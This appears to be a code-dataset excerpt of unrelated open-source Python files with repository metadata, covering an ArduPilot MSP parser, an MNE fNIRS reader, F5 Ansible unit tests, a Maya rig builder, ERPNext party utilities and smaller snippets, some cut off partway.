We add two methods to the basic `Module` API: `get_input_dim()` and `get_output_dim()`.
You might need this if you want to construct a `Linear` layer using the output of this encoder,
or to raise sensible errors for mis-matching input dimensions.
"""
def get_input_dim(self) -> int:
"""
Returns the dimension of the vector input for each element in the sequence input
to a `Seq2VecEncoder`. This is `not` the shape of the input tensor, but the
last element of that shape.
"""
        raise NotImplementedError
    def get_output_dim(self) -> int:
"""
Returns the dimension of the final vector output by this `Seq2VecEncoder`. This is `not`
the shape of the returned tensor, but the last element of that shape.
"""
raise NotImplementedError
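# --- Illustrative sketch (not part of the module above) ---------------------
# A minimal concrete Seq2VecEncoder that mean-pools over the sequence
# dimension. The registration name and the mask handling are assumptions made
# for this example only; torch is a dependency of the surrounding library.
import torch


@Seq2VecEncoder.register("example-mean-pooling")
class ExampleMeanPoolingEncoder(Seq2VecEncoder):
    def __init__(self, embedding_dim: int) -> None:
        super().__init__()
        self._embedding_dim = embedding_dim

    def get_input_dim(self) -> int:
        return self._embedding_dim

    def get_output_dim(self) -> int:
        return self._embedding_dim

    def forward(self, tokens: torch.Tensor, mask: torch.Tensor = None) -> torch.Tensor:
        # (batch_size, sequence_length, input_dim) -> (batch_size, output_dim)
        if mask is None:
            return tokens.mean(dim=1)
        mask = mask.float().unsqueeze(-1)
        return (tokens * mask).sum(dim=1) / mask.sum(dim=1).clamp(min=1.0)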
|
william-fiset/Survival
|
__init__.py
|
Python
|
apache-2.0
| 79
| 0.012658
|
from .main import main
# run the program
if __name__ == '__main__':
    main()
|
SelvorWhim/competitive
|
Codewars/PrincipalDiagonalVsSecondaryDiagonal.py
|
Python
|
unlicense
| 396
| 0.007576
|
def sum_diagonal_principal(matrix):
return sum(matrix[i][i] for i in range(len(matrix)))
def sum_diagonal_secondary(matrix):
return sum(matrix[i][-i-1] for i in range(len(matrix)))
def diagonal(matrix):
s1 = sum_diagonal_principal(matrix)
s2 = sum_diagonal_secondary(matrix)
    return "Principal Diagonal win!" if s1 > s2 else "Secondary Diagonal win!" if s1 < s2 else "Draw!"
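# Small illustrative check (not part of the kata solution above):
if __name__ == '__main__':
    # principal diagonal: 1 + 5 + 9 = 15, secondary: 3 + 5 + 7 = 15 -> "Draw!"
    print(diagonal([[1, 2, 3], [4, 5, 6], [7, 8, 9]]))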
|
AlexWPerfComm/Python-JIRA
|
const/Constants.py
|
Python
|
mit
| 65
| 0
|
AUTH_URL = "https://quality.hubwoo.com/rest/auth/latest/session"
|
squilter/ardupilot
|
libraries/AP_MSP/Tools/pymsp.py
|
Python
|
gpl-3.0
| 18,847
| 0.014114
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
author: Alex Apostoli
based on https://github.com/hkm95/python-multiwii
which is under GPLv3
"""
import struct
import time
import sys
import re
class MSPItem:
def __init__(self, name, fmt, fields):
self.name = name
self.format = fmt
self.fields = fields
if not isinstance(self.format, list):
self.format = [self.format]
self.fields = [self.fields]
self.values = {}
def parse(self, msp, dataSize):
'''parse data'''
ofs = msp.p
for i in range(len(self.format)):
fmt = self.format[i]
fields = self.fields[i].split(',')
if fmt[0] == '{':
# we have a repeat count from an earlier variable
right = fmt.find('}')
vname = fmt[1:right]
count = self.values[vname]
fmt = "%u%s" % (count, fmt[right+1:])
if fmt[0].isdigit():
repeat = int(re.search(r'\d+', fmt).group())
else:
repeat = None
fmt = "<" + fmt
fmt_size = struct.calcsize(fmt)
if dataSize < fmt_size:
raise Exception("Format %s needs %u bytes got %u for %s" % (self.name, fmt_size, dataSize, fmt))
values = list(struct.unpack(fmt, msp.inBuf[ofs:ofs+fmt_size]))
            if repeat is not None:
for i in range(len(fields)):
self.values[fields[i]] = []
for j in range(repeat):
                        self.values[fields[i]].append(values[j*len(fields)+i])
else:
for i in range(len(fields)):
self.values[fields[i]] = values[i]
dataSize -= fmt_size
ofs += fmt_size
msp.by_name[self.name] = self
#print("Got %s" % self.name)
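# --- Illustrative sketch (not part of the module above) ---------------------
# How MSPItem.parse expands a "{name}" repeat count: a format list such as
# ["B", "{count}H"] (made up for this sketch) first reads one byte into
# 'count' and then reads that many unsigned shorts. The helper below mirrors
# that expansion for a made-up payload layout (count byte + 'count' uint16s).
def _example_repeat_count_parse(payload):
    """Unpack a one-byte count followed by that many little-endian uint16 values."""
    import struct
    (count,) = struct.unpack("<B", payload[:1])
    return struct.unpack("<%uH" % count, payload[1:1 + 2 * count])

# e.g. _example_repeat_count_parse(struct.pack("<B3H", 3, 370, 380, 390))
# returns (370, 380, 390).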
class PyMSP:
""" Multiwii Serial Protocol """
OSD_RSSI_VALUE = 0
OSD_MAIN_BATT_VOLTAGE = 1
OSD_CROSSHAIRS = 2
OSD_ARTIFICIAL_HORIZON = 3
OSD_HORIZON_SIDEBARS = 4
OSD_ITEM_TIMER_1 = 5
OSD_ITEM_TIMER_2 = 6
OSD_FLYMODE = 7
OSD_CRAFT_NAME = 8
OSD_THROTTLE_POS = 9
OSD_VTX_CHANNEL = 10
OSD_CURRENT_DRAW = 11
OSD_MAH_DRAWN = 12
OSD_GPS_SPEED = 13
OSD_GPS_SATS = 14
OSD_ALTITUDE = 15
OSD_ROLL_PIDS = 16
OSD_PITCH_PIDS = 17
OSD_YAW_PIDS = 18
OSD_POWER = 19
OSD_PIDRATE_PROFILE = 20
OSD_WARNINGS = 21
OSD_AVG_CELL_VOLTAGE = 22
OSD_GPS_LON = 23
OSD_GPS_LAT = 24
OSD_DEBUG = 25
OSD_PITCH_ANGLE = 26
OSD_ROLL_ANGLE = 27
OSD_MAIN_BATT_USAGE = 28
OSD_DISARMED = 29
OSD_HOME_DIR = 30
OSD_HOME_DIST = 31
OSD_NUMERICAL_HEADING = 32
OSD_NUMERICAL_VARIO = 33
OSD_COMPASS_BAR = 34
OSD_ESC_TMP = 35
OSD_ESC_RPM = 36
OSD_REMAINING_TIME_ESTIMATE = 37
OSD_RTC_DATETIME = 38
OSD_ADJUSTMENT_RANGE = 39
OSD_CORE_TEMPERATURE = 40
OSD_ANTI_GRAVITY = 41
OSD_G_FORCE = 42
OSD_MOTOR_DIAG = 43
OSD_LOG_STATUS = 44
OSD_FLIP_ARROW = 45
OSD_LINK_QUALITY = 46
OSD_FLIGHT_DIST = 47
OSD_STICK_OVERLAY_LEFT = 48
OSD_STICK_OVERLAY_RIGHT = 49
OSD_DISPLAY_NAME = 50
OSD_ESC_RPM_FREQ = 51
OSD_RATE_PROFILE_NAME = 52
OSD_PID_PROFILE_NAME = 53
OSD_PROFILE_NAME = 54
OSD_RSSI_DBM_VALUE = 55
OSD_RC_CHANNELS = 56
OSD_CAMERA_FRAME = 57
MSP_NAME =10
MSP_OSD_CONFIG =84
MSP_IDENT =100
MSP_STATUS =101
MSP_RAW_IMU =102
MSP_SERVO =103
MSP_MOTOR =104
MSP_RC =105
MSP_RAW_GPS =106
MSP_COMP_GPS =107
MSP_ATTITUDE =108
MSP_ALTITUDE =109
MSP_ANALOG =110
MSP_RC_TUNING =111
MSP_PID =112
MSP_BOX =113
MSP_MISC =114
MSP_MOTOR_PINS =115
MSP_BOXNAMES =116
MSP_PIDNAMES =117
MSP_WP =118
MSP_BOXIDS =119
MSP_SERVO_CONF =120
MSP_NAV_STATUS =121
MSP_NAV_CONFIG =122
MSP_MOTOR_3D_CONFIG =124
MSP_RC_DEADBAND =125
MSP_SENSOR_ALIGNMENT =126
MSP_LED_STRIP_MODECOLOR =127
MSP_VOLTAGE_METERS =128
MSP_CURRENT_METERS =129
MSP_BATTERY_STATE =130
MSP_MOTOR_CONFIG =131
MSP_GPS_CONFIG =132
MSP_COMPASS_CONFIG =133
MSP_ESC_SENSOR_DATA =134
MSP_GPS_RESCUE =135
MSP_GPS_RESCUE_PIDS =136
MSP_VTXTABLE_BAND =137
MSP_VTXTABLE_POWERLEVEL =138
MSP_MOTOR_TELEMETRY =139
MSP_SET_RAW_RC =200
MSP_SET_RAW_GPS =201
MSP_SET_PID =202
MSP_SET_BOX =203
MSP_SET_RC_TUNING =204
MSP_ACC_CALIBRATION =205
MSP_MAG_CALIBRATION =206
MSP_SET_MISC =207
MSP_RESET_CONF =208
MSP_SET_WP =209
MSP_SELECT_SETTING =210
MSP_SET_HEAD =211
MSP_SET_SERVO_CONF =212
MSP_SET_MOTOR =214
MSP_SET_NAV_CONFIG =215
MSP_SET_MOTOR_3D_CONFIG =217
MSP_SET_RC_DEADBAND =218
MSP_SET_RESET_CURR_PID =219
MSP_SET_SENSOR_ALIGNMENT =220
MSP_SET_LED_STRIP_MODECOLOR=221
MSP_SET_MOTOR_CONFIG =222
MSP_SET_GPS_CONFIG =223
MSP_SET_COMPASS_CONFIG =224
MSP_SET_GPS_RESCUE =225
MSP_SET_GPS_RESCUE_PIDS =226
MSP_SET_VTXTABLE_BAND =227
MSP_SET_VTXTABLE_POWERLEVEL=228
MSP_BIND =241
MSP_RTC =247
MSP_EEPROM_WRITE =250
MSP_DEBUGMSG =253
MSP_DEBUG =254
IDLE = 0
HEADER_START = 1
HEADER_M = 2
HEADER_ARROW = 3
HEADER_SIZE = 4
HEADER_CMD = 5
HEADER_ERR = 6
PIDITEMS = 10
MESSAGES = {
MSP_RAW_GPS: MSPItem('RAW_GPS', "BBiihH", "fix,numSat,Lat,Lon,Alt,Speed"),
MSP_IDENT: MSPItem('IDENT', "BBBI", "version,multiType,MSPVersion,multiCapability"),
MSP_STATUS: MSPItem('STATUS', "HHHI", "cycleTime,i2cError,present,mode"),
MSP_RAW_IMU: MSPItem('RAW_IMU', "hhhhhhhhh", "AccX,AccY,AccZ,GyrX,GyrY,GyrZ,MagX,MagY,MagZ"),
MSP_SERVO: MSPItem('SERVO', "8h", "servo"),
MSP_MOTOR: MSPItem('MOTOR', "8h", "motor"),
MSP_RC: MSPItem('RC', "8h", "rc"),
MSP_COMP_GPS: MSPItem('COMP_GPS', "HhB", "distanceToHome,directionToHome,update"),
MSP_ATTITUDE: MSPItem('ATTITUDE', "hhh", "roll,pitch,yaw"),
MSP_ALTITUDE: MSPItem('ALTITUDE', "ih", "alt,vspeed"),
MSP_RC_TUNING: MSPItem('RC_TUNING', "BBBBBBB", "RC_Rate,RC_Expo,RollPitchRate,YawRate,DynThrPID,ThrottleMID,ThrottleExpo"),
MSP_BATTERY_STATE: MSPItem('BATTERY_STATE', "BHBHh", "cellCount,capacity,voltage,mah,current"),
MSP_RTC: MSPItem('RTC', "HBBBBBH", "year,mon,mday,hour,min,sec,millis"),
MSP_OSD_CONFIG: MSPItem("OSD_CONFIG",
["BBBBHBBH",
"{os
|
imankulov/gevent-websocket
|
setup.py
|
Python
|
bsd-3-clause
| 946
| 0.002114
|
from setuptools import setup, find_packages
setup(
name="gevent-websocket",
version="0.3.6",
description="Websocket handler for the gevent pywsgi server, a Python network library",
long_description=open("README.rst").read(),
author="Jeffrey Gelens",
author_email="[email protected]",
license="BSD",
url="https://bitbucket.org/Jeffrey/gevent-websocket",
download_url="https://bitbucket.org/Jeffrey/gevent-websocket",
install_requires=("gevent", "greenlet"),
    packages=find_packages(exclude=["examples","tests"]),
    classifiers=[
        "Development Status :: 4 - Beta",
        "License :: OSI Approved :: BSD License",
        "Programming Language :: Python",
        "Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
"Intended Audience :: Developers",
],
)
|
OWStimpson/oscar_webstore
|
oscar_webstore_root/forked_apps/catalogue/__init__.py
|
Python
|
bsd-3-clause
| 68
| 0
|
default_app_config = 'forked_apps.catalogue.config.CatalogueConfig'
|
Teekuningas/mne-python
|
mne/io/nirx/nirx.py
|
Python
|
bsd-3-clause
| 13,599
| 0
|
# Authors: Robert Luke <[email protected]>
#
# License: BSD (3-clause)
from configparser import ConfigParser, RawConfigParser
import glob as glob
import re as re
import os.path as op
import numpy as np
from ..base import BaseRaw
from ..constants import FIFF
from ..meas_info import create_info, _format_dig_points
from ...annotations import Annotations
from ...transforms import apply_trans, _get_trans
from ...utils import logger, verbose, fill_doc
from ...utils import warn
@fill_doc
def read_raw_nirx(fname, preload=False, verbose=None):
"""Reader for a NIRX fNIRS recording.
This function has only been tested with NIRScout devices.
Parameters
----------
fname : str
Path to the NIRX data folder or header file.
%(preload)s
%(verbose)s
Returns
-------
raw : instance of RawNIRX
A Raw object containing NIRX data.
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
return RawNIRX(fname, preload, verbose)
def _open(fname):
return open(fname, 'r', encoding='latin-1')
@fill_doc
class RawNIRX(BaseRaw):
"""Raw object from a NIRX fNIRS file.
Parameters
----------
fname : str
Path to the NIRX data folder or header file.
%(preload)s
%(verbose)s
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
@verbose
def __init__(self, fname, preload=False, verbose=None):
from ...externals.pymatreader import read_mat
from ...coreg import get_mni_fiducials # avoid circular import prob
logger.info('Loading %s' % fname)
if fname.endswith('.hdr'):
fname = op.dirname(op.abspath(fname))
if not op.isdir(fname):
raise RuntimeError('The path you specified does not exist.')
# Check if required files exist and store names for later use
files = dict()
keys = ('hdr', 'inf', 'set', 'tpl', 'wl1', 'wl2',
'config.txt', 'probeInfo.mat')
for key in keys:
files[key] = glob.glob('%s/*%s' % (fname, key))
if len(files[key]) != 1:
raise RuntimeError('Expect one %s file, got %d' %
(key, len(files[key]),))
files[key] = files[key][0]
if len(glob.glob('%s/*%s' % (fname, 'dat'))) != 1:
warn("A single dat file was expected in the specified path, but "
"got %d. This may indicate that the file structure has been "
"modified since the measurement was saved." %
(len(glob.glob('%s/*%s' % (fname, 'dat')))))
# Read number of rows/samples of wavelength data
last_sample = -1
with _open(files['wl1']) as fid:
for line in fid:
last_sample += 1
# Read header file
# The header file isn't compliant with the configparser. So all the
# text between comments must be removed before passing to parser
with _open(files['hdr']) as f:
hdr_str = f.read()
hdr_str = re.sub('#.*?#', '', hdr_str, flags=re.DOTALL)
hdr = RawConfigParser()
hdr.read_string(hdr_str)
        # Check that the file format version is supported
        if not any(item == hdr['GeneralInfo']['NIRStar'] for item in
                   ["\"15.0\"", "\"15.2\""]):
raise RuntimeError('MNE does not support this NIRStar version'
' (%s)' % (hdr['GeneralInfo']['NIRStar'],))
if "NIRScout" not in hdr['GeneralInfo']['Device']:
warn("Only import of data from NIRScout devices have been "
"thoroughly tested. You are using a %s device. " %
hdr['GeneralInfo']['Device'])
# Parse required header fields
# Extract frequencies of light used by machine
fnirs_wavelengths = [int(s) for s in
re.findall(r'(\d+)',
hdr['ImagingParameters']['Wavelengths'])]
# Extract source-detectors
sources = np.asarray([int(s) for s in re.findall(r'(\d+)-\d+:\d+',
hdr['DataStructure']['S-D-Key'])], int)
detectors = np.asarray([int(s) for s in re.findall(r'\d+-(\d+):\d+',
hdr['DataStructure']['S-D-Key'])], int)
# Determine if short channels are present and on which detectors
if 'shortbundles' in hdr['ImagingParameters']:
short_det = [int(s) for s in
re.findall(r'(\d+)',
hdr['ImagingParameters']['ShortDetIndex'])]
short_det = np.array(short_det, int)
else:
short_det = []
# Extract sampling rate
samplingrate = float(hdr['ImagingParameters']['SamplingRate'])
# Read participant information file
inf = ConfigParser(allow_no_value=True)
inf.read(files['inf'])
inf = inf._sections['Subject Demographics']
# Store subject information from inf file in mne format
# Note: NIRX also records "Study Type", "Experiment History",
# "Additional Notes", "Contact Information" and this information
# is currently discarded
subject_info = {}
names = inf['name'].split()
if len(names) > 0:
subject_info['first_name'] = \
inf['name'].split()[0].replace("\"", "")
if len(names) > 1:
subject_info['last_name'] = \
inf['name'].split()[-1].replace("\"", "")
if len(names) > 2:
subject_info['middle_name'] = \
inf['name'].split()[-2].replace("\"", "")
# subject_info['birthday'] = inf['age'] # TODO: not formatted properly
subject_info['sex'] = inf['gender'].replace("\"", "")
# Recode values
if subject_info['sex'] in {'M', 'Male', '1'}:
subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_MALE
elif subject_info['sex'] in {'F', 'Female', '2'}:
subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_FEMALE
# NIRStar does not record an id, or handedness by default
# Read information about probe/montage/optodes
# A word on terminology used here:
# Sources produce light
# Detectors measure light
# Sources and detectors are both called optodes
# Each source - detector pair produces a channel
# Channels are defined as the midpoint between source and detector
mat_data = read_mat(files['probeInfo.mat'], uint16_codec=None)
requested_channels = mat_data['probeInfo']['probes']['index_c']
src_locs = mat_data['probeInfo']['probes']['coords_s3'] / 100.
det_locs = mat_data['probeInfo']['probes']['coords_d3'] / 100.
ch_locs = mat_data['probeInfo']['probes']['coords_c3'] / 100.
# These are all in MNI coordinates, so let's transform them to
# the Neuromag head coordinate frame
mri_head_t, _ = _get_trans('fsaverage', 'mri', 'head')
src_locs = apply_trans(mri_head_t, src_locs)
det_locs = apply_trans(mri_head_t, det_locs)
ch_locs = apply_trans(mri_head_t, ch_locs)
# Set up digitization
dig = get_mni_fiducials('fsaverage', verbose=False)
for fid in dig:
fid['r'] = apply_trans(mri_head_t, fid['r'])
fid['coord_frame'] = FIFF.FIFFV_COORD_HEAD
for ii, ch_loc in enumerate(ch_locs, 1):
dig.append(dict(
kind=FIFF.FIFFV_POINT_EEG, # misnomer but probably okay
r=ch_loc,
ident=ii,
coord_frame=FIFF.FIFFV_COORD_HEAD,
))
dig = _format_dig_points(dig)
del mri_head_t
# Determine requested channel indices
# The wl1 and wl2 files include all possible source - detector pairs.
# But most of these are not relevant. We want to extract only the
# subset requested in the probe file
req_ind = np.array([], int)
for req_idx in range(requested_channels.shape[0]):
sd_idx = np.where((so
|
qma/pants
|
src/python/pants/backend/python/tasks/checkstyle/plugin_subsystem_base.py
|
Python
|
apache-2.0
| 886
| 0.006772
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.subsystem.subsystem import Subsystem
class PluginSubsystemBase(Subsystem):
@classmethod
def register_options(cls, register):
super(PluginSubsystemBase, cls).register_options(register)
    # All checks have this option.
    register('--skip', default=False, action='store_true',
help='If enabled, skip this style checker.')
def get_plugin(self, python_file):
return self.get_plugin_type()(self.get_options(), python_file)
def get_plugin_type(self):
    raise NotImplementedError('get_plugin_type() not implemented in class {}'.format(type(self)))
|
jamesbdunlop/defaultMayaLibrary
|
tools/rigComponentBuilder.py
|
Python
|
apache-2.0
| 4,466
| 0.005598
|
import logging
logging.basicConfig()
logger = logging.getLogger(__name__)
import maya.cmds as cmds
import constants as const
import rigBuildLib as complib
reload(complib)
class Component(object):
def __init__(self):
self.cmpdata = {}
self.compName = None
self.compSide = None
self.compColor = None
def defineComponent(self, name, side):
"""
Creates the base layout for the component as it would appear in scene
:param name: The name of the component
:param side: The side of the component
:return:
"""
self.compName = name
self.compSide = side
data = {}
data[name] = {}
data[name]['layers'] = ["input", "output", "control", "parts", "deform", 'definition']
data[name]['inputs'] = ["componentDomain"]
data[name]['parts'] = ["hidden"]
self.setCompColor()
return data
@property
def data(self):
return self.cmpdata
@property
def layer(self):
return self.cmpdata
@property
def name(self):
        return self.compName
@property
def side(self):
return self.compSide
@property
def color(self):
        return self.compColor
def setCompColor(self):
if self.side == "L":
self.compColor = 14
elif self.side == "R":
self.compColor = 13
else:
self.compColor = 25
def addCustomInput(self, name):
grpName = "{}_input".format(name)
inputGrp = complib.createGroup(grpName, self.name, self.side,)
complib.createDefaultMetaData(inputGrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputGrp, self.cmpdata['input'])
self.cmpdata[name] = inputGrp
def addCustomPartsGroup(self, name):
grpName = "{}_{}".format(name, const.GROUP_SUFFIX['master'])
inputGrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(inputGrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputGrp, self.cmpdata['parts'])
self.cmpdata[name] = inputGrp
def createComponent(self, name = None, side = None):
"""
Builds the component using the name and side supplied and the definition layers
:param name: The name of the component
:param side: The side of the component eg L R M
:type name: String
:type side: String
:return:
"""
GRPSUFX = const.GROUP_SUFFIX['master']
## Define the component layout now
data = self.defineComponent(name, side)
data['name'] = name
data['side'] = side
## Build the groups
## TOP GROUP
grpName = "{GRPSUFX}".format(**locals())
baseGrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(baseGrp, self.name, self.side, 'componentMasterGroup')
## LAYERS
layers = data[name]["layers"]
for eachLayer in layers:
grpName = "{eachLayer}".format(**locals())
lgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(lgrp, self.name, self.side, 'componentGroup')
data[eachLayer] = lgrp
complib.parentTo(lgrp, baseGrp)
### INPUTS
## Doesn't handle buffers, this just does straight single inputs
for eachInput in data[name]['inputs']:
grpName = "{eachInput}_srt".format(**locals())
inputgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(inputgrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputgrp, data['input'])
if eachInput == 'componentDomain':
data["componentDomain"] = inputgrp
### PARTS
for eachPart in data[name]['parts']:
grpName = "{eachPart}_{GRPSUFX}".format(**locals())
partsgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(partsgrp, self.name, self.side, 'componentGroup')
complib.parentTo(partsgrp, data['parts'])
logger.info('Component {name}_{side} created successfully.'.format(**locals()))
logger.info('Component data: {data}'.format(**locals()))
self.cmpdata = data
logger.info('self.cmpdata: {}'.format(self.cmpdata))
return self.cmpdata
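# --- Illustrative usage (not part of the module above) ----------------------
# createComponent only needs a name and a side; the rest of the layout comes
# from defineComponent. Must be run inside a Maya session; the name and side
# below are assumptions for the example.
def _example_build_arm_component():
    arm = Component()
    return arm.createComponent(name='arm', side='L')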
|
alexlo03/ansible
|
test/units/modules/network/f5/test_bigip_gtm_pool.py
|
Python
|
gpl-3.0
| 11,200
| 0.000446
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import sys
from nose.plugins.skip import SkipTest
if sys.version_info < (2, 7):
raise SkipTest("F5 Ansible modules require Python >= 2.7")
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigip_gtm_pool import ApiParameters
from library.modules.bigip_gtm_pool import ModuleParameters
from library.modules.bigip_gtm_pool import ModuleManager
from library.modules.bigip_gtm_pool import ArgumentSpec
from library.modules.bigip_gtm_pool import UntypedManager
from library.modules.bigip_gtm_pool import TypedManager
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
from test.unit.modules.utils import set_module_args
except ImportError:
try:
from ansible.modules.network.f5.bigip_gtm_pool import ApiParameters
from ansible.modules.network.f5.bigip_gtm_pool import ModuleParameters
from ansible.modules.network.f5.bigip_gtm_pool import ModuleManager
from ansible.modules.network.f5.bigip_gtm_pool import ArgumentSpec
from ansible.modules.network.f5.bigip_gtm_pool import UntypedManager
from ansible.modules.network.f5.bigip_gtm_pool import TypedManager
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
from units.modules.utils import set_module_args
    except ImportError:
        raise SkipTest("F5 Ansible modules require the f5-sdk Python library")
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
args = dict(
name='foo',
preferred_lb_method='topology',
alternate_lb_method='ratio',
fallback_lb_method='fewest-hops',
fallback_ip='10.10.10.10',
type='a'
)
p = ModuleParameters(params=args)
assert p.name == 'foo'
assert p.preferred_lb_method == 'topology'
assert p.alternate_lb_method == 'ratio'
assert p.fallback_lb_method == 'fewest-hops'
assert p.fallback_ip == '10.10.10.10'
assert p.type == 'a'
def test_module_parameters_members(self):
args = dict(
partition='Common',
members=[
dict(
server='foo',
virtual_server='bar'
)
]
)
p = ModuleParameters(params=args)
assert len(p.members) == 1
assert p.members[0] == '/Common/foo:bar'
def test_api_parameters(self):
args = dict(
name='foo',
loadBalancingMode='topology',
alternateMode='ratio',
fallbackMode='fewest-hops',
fallbackIp='10.10.10.10'
)
p = ApiParameters(params=args)
assert p.name == 'foo'
assert p.preferred_lb_method == 'topology'
assert p.alternate_lb_method == 'ratio'
assert p.fallback_lb_method == 'fewest-hops'
assert p.fallback_ip == '10.10.10.10'
def test_api_parameters_members(self):
args = load_fixture('load_gtm_pool_a_with_members_1.json')
p = ApiParameters(params=args)
assert len(p.members) == 3
assert p.members[0] == '/Common/server1:vs1'
assert p.members[1] == '/Common/server1:vs2'
assert p.members[2] == '/Common/server1:vs3'
class TestUntypedManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_create_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='round-robin',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'round-robin'
def test_update_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='topology',
alternate_lb_method='drop-packet',
fallback_lb_method='cpu',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
current = ApiParameters(params=load_fixture('load_gtm_pool_untyped_default.json'))
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[True, True])
tm.update_on_device = Mock(return_value=True)
tm.read_current_from_device = Mock(return_value=current)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'topology'
assert results['alternate_lb_method'] == 'drop-packet'
assert results['fallback_lb_method'] == 'cpu'
def test_delete_pool(self, *args):
set_module_args(dict(
name='foo',
state='absent',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[True, False])
tm.remove_from_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
class TestTypedManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_create_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='round-robin',
type='a',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.sup
|
informatics-isi-edu/deriva-py
|
deriva/transfer/backup/__main__.py
|
Python
|
apache-2.0
| 361
| 0.00554
|
import sys
from deriva.transfer import DerivaBackupCLI
DESC = "Deriva Catalog Backup Utility - CLI"
INFO = "For more information see: https://github.com/informatics-isi-edu/deriva-py"
def main():
cli = DerivaBackupCLI(DESC, INFO, hostname_required=True, config_file_required=False)
return cli.main()
if __name__ == '__main__':
sys.exit(main())
|
emmuchira/kps_erp
|
erpnext/accounts/party.py
|
Python
|
gpl-3.0
| 16,798
| 0.025063
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import datetime
from frappe import _, msgprint, scrub
from frappe.defaults import get_user_permissions
from frappe.model.utils import get_fetch_values
from frappe.utils import (add_days, getdate, formatdate, get_first_day, date_diff,
add_years, get_timestamp, nowdate, flt)
from frappe.contacts.doctype.address.address import (get_address_display,
get_default_address, get_company_address)
from frappe.contacts.doctype.contact.contact import get_contact_details, get_default_contact
from erpnext.exceptions import PartyFrozen, PartyDisabled, InvalidAccountCurrency
from erpnext.accounts.utils import get_fiscal_year
from erpnext import get_default_currency, get_company_currency
class DuplicatePartyAccountError(frappe.ValidationError): pass
@frappe.whitelist()
def get_party_details(party=None, account=None, party_type="Customer", company=None,
posting_date=None, price_list=None, currency=None, doctype=None, ignore_permissions=False):
if not party:
return {}
if not frappe.db.exists(party_type, party):
frappe.throw(_("{0}: {1} does not exists").format(party_type, party))
return _get_party_details(party, account, party_type,
company, posting_date, price_list, currency, doctype, ignore_permissions)
def _get_party_details(party=None, account=None, party_type="Customer", company=None,
posting_date=None, price_list=None, currency=None, doctype=None, ignore_permissions=False):
out = frappe._dict(set_account_and_due_date(party, account, party_type, company, posting_date, doctype))
party = out[party_type.lower()]
if not ignore_permissions and not frappe.has_permission(party_type, "read", party):
frappe.throw(_("Not permitted for {0}").format(party), frappe.PermissionError)
party = frappe.get_doc(party_type, party)
currency = party.default_currency if party.default_currency else get_company_currency(company)
set_address_details(out, party, party_type, doctype, company)
set_contact_details(out, party, party_type)
set_other_values(out, party, party_type)
set_price_list(out, party, party_type, price_list)
